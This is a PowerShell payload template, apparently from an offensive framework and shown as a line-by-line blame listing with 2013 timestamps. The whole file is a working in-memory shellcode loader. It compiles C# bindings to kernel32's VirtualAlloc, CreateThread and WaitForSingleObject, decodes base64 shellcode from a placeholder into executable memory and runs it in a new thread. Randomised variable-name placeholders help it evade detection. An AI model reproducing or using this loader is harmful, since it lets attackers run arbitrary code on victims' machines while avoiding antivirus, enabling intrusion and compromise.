2013-08-20 23:52:58 +00:00
|
|
|
Set-StrictMode -Version 2
|
|
|
|
$%{var_syscode} = @"
|
|
|
|
using System;
|
|
|
|
using System.Runtime.InteropServices;
|
|
|
|
namespace %{var_kernel32} {
|
|
|
|
public class func {
|
|
|
|
[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
|
|
|
|
[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
|
|
|
|
[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
|
|
|
|
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
|
|
|
|
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
|
|
|
|
[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
|
|
|
|
}
|
|
|
|
}
|
|
|
|
"@
|
|
|
|
|
|
|
|
$%{var_codeProvider} = New-Object Microsoft.CSharp.CSharpCodeProvider
|
|
|
|
$%{var_compileParams} = New-Object System.CodeDom.Compiler.CompilerParameters
|
|
|
|
$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
|
|
|
|
$%{var_compileParams}.GenerateInMemory = $True
|
|
|
|
$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
|
|
|
|
|
2013-10-25 00:19:43 +00:00
|
|
|
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
|
2013-08-20 23:52:58 +00:00
|
|
|
|
|
|
|
$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
|
|
|
|
if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
|
|
|
|
[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
|
|
|
|
[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
|
|
|
|
if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
|
|
|
|
$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)
|